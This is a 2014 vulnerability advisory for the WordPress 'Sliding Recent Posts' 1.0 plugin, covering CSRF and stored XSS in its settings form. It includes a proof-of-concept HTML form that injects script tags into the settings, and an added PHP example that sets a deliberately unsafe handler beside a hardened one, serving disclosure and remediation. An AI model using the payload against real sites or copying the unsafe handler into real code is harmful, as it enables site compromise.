
WordPress Sliding Recent Posts 1.0 CSRF / XSS

Posted on 13 December 2014

Title: WordPress 'Sliding Recent Posts' plugin - CSRF/XSS
Version: 1.0
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2014/12/12
Download: https://wordpress.org/plugins/sliding-recent-posts/
Notified WordPress: 2014/11/27

----------------------------------------------------------------
## Description:
----------------------------------------------------------------
This plugin displays a widget on your site that slides into the screen when you click on it and shows a list of recent posts with thumbnails.

----------------------------------------------------------------
## CSRF:
----------------------------------------------------------------
The settings form is not protected by a nonce, so it is possible to change the plugin's admin settings by tricking a logged-in admin into visiting a crafted page.

----------------------------------------------------------------
## Stored XSS:
----------------------------------------------------------------
Settings data submitted from the admin page is stored unsanitized and echoed back, unescaped, on the plugin's admin page. This allows an attacker to perform stored XSS through the settings fields.

PoC: Log in as admin and then submit the following form.

<form method="POST" action="http://[DOMAIN]/wp-admin/admin.php?page=sliding-recent-posts.php">
<input type="text" name="num_posts" value="3"><br />
<input type="text" name="position" value=""><script>alert(1)</script>"><br />
<input type="text" name="background_color" value="#798746"/><script>alert(2)</script>"><br />
<input type="text" name="font_color" value="#ffffff"><br />
<input type="text" name="ll__opt[disable]" value="Save"><br />
<input type="text" name="srp_save" value="save"><br />
<input type="submit">
</form>

----------------------------------------------------------------
## Solution
----------------------------------------------------------------
No fix has been released. WordPress has been notified and the plugin has been closed until it is updated.
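The two defects above (no nonce on the settings handler, and settings stored and echoed without sanitisation or escaping) are a common pair in WordPress plugins. The following is an added illustration written for this page, not the Sliding Recent Posts plugin's own code: the unsafe pattern the advisory describes next to a hardened handler that uses only standard WordPress API calls. The option name `srp_settings`, the nonce action `srp_save_settings`, the `manage_options` capability and the `left`/`right` allowlist for `position` are assumptions chosen for the example; the field names are those from the PoC form.

```php
<?php
/*
 * Added illustration, not the plugin's code. Assumed names: option
 * `srp_settings`, nonce action `srp_save_settings`, nonce field `srp_nonce`,
 * and an allowlist of `left`/`right` for the `position` setting.
 */

// UNSAFE pattern (what the advisory describes): no capability check, no
// nonce, raw POST data stored, and stored values echoed straight into HTML.
function srp_example_settings_page_unsafe() {
    if ( isset( $_POST['srp_save'] ) ) {
        update_option( 'srp_settings', array(
            'num_posts'        => $_POST['num_posts'],
            'position'         => $_POST['position'],
            'background_color' => $_POST['background_color'],
            'font_color'       => $_POST['font_color'],
        ) );
    }
    $s = get_option( 'srp_settings', array() );
    // A stored value such as "><script>alert(1)</script> closes the
    // attribute and runs on every load of this admin page.
    echo '<form method="POST">';
    echo '<input type="text" name="position" value="' . $s['position'] . '">';
    echo '<input type="submit" name="srp_save" value="save"></form>';
}

// Constructed helper: accept only a six-digit hex colour, else fall back.
function srp_example_sanitize_hex( $value, $default ) {
    $value = (string) wp_unslash( $value );
    return preg_match( '/^#[0-9a-fA-F]{6}$/', $value ) ? strtolower( $value ) : $default;
}

// HARDENED pattern: capability check, nonce verification (stops the
// cross-site form from the PoC), type-appropriate sanitisation on input,
// and attribute escaping on output.
function srp_example_settings_page_safe() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'You do not have permission to change these settings.' );
    }
    if ( isset( $_POST['srp_save'] ) ) {
        // Dies with a 403-style page unless a valid nonce for this action
        // is present, which a third-party page cannot supply.
        check_admin_referer( 'srp_save_settings', 'srp_nonce' );

        $position = isset( $_POST['position'] ) ? sanitize_text_field( wp_unslash( $_POST['position'] ) ) : '';
        update_option( 'srp_settings', array(
            'num_posts'        => absint( $_POST['num_posts'] ?? 0 ),
            'position'         => in_array( $position, array( 'left', 'right' ), true ) ? $position : 'right',
            'background_color' => srp_example_sanitize_hex( $_POST['background_color'] ?? '', '#000000' ),
            'font_color'       => srp_example_sanitize_hex( $_POST['font_color'] ?? '', '#ffffff' ),
        ) );
    }
    $s = wp_parse_args( get_option( 'srp_settings', array() ), array(
        'num_posts' => 3, 'position' => 'right',
        'background_color' => '#000000', 'font_color' => '#ffffff',
    ) );
    echo '<form method="POST">';
    wp_nonce_field( 'srp_save_settings', 'srp_nonce' );   // emits the hidden nonce input
    // esc_attr() neutralises quotes and angle brackets even if a bad value
    // somehow reached the database, so output is safe independently of input checks.
    echo '<input type="text" name="num_posts" value="' . esc_attr( $s['num_posts'] ) . '">';
    echo '<input type="text" name="position" value="' . esc_attr( $s['position'] ) . '">';
    echo '<input type="text" name="background_color" value="' . esc_attr( $s['background_color'] ) . '">';
    echo '<input type="text" name="font_color" value="' . esc_attr( $s['font_color'] ) . '">';
    echo '<input type="submit" name="srp_save" value="save"></form>';
}
```

Sanitising on input and escaping on output are deliberately both present: the allowlist and hex check keep garbage out of the option, while `esc_attr()` protects the page even when the stored value is wrong for some other reason. The nonce check alone is what closes the CSRF vector, since an attacker's page cannot read the per-session nonce that `wp_nonce_field()` renders for the logged-in admin.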
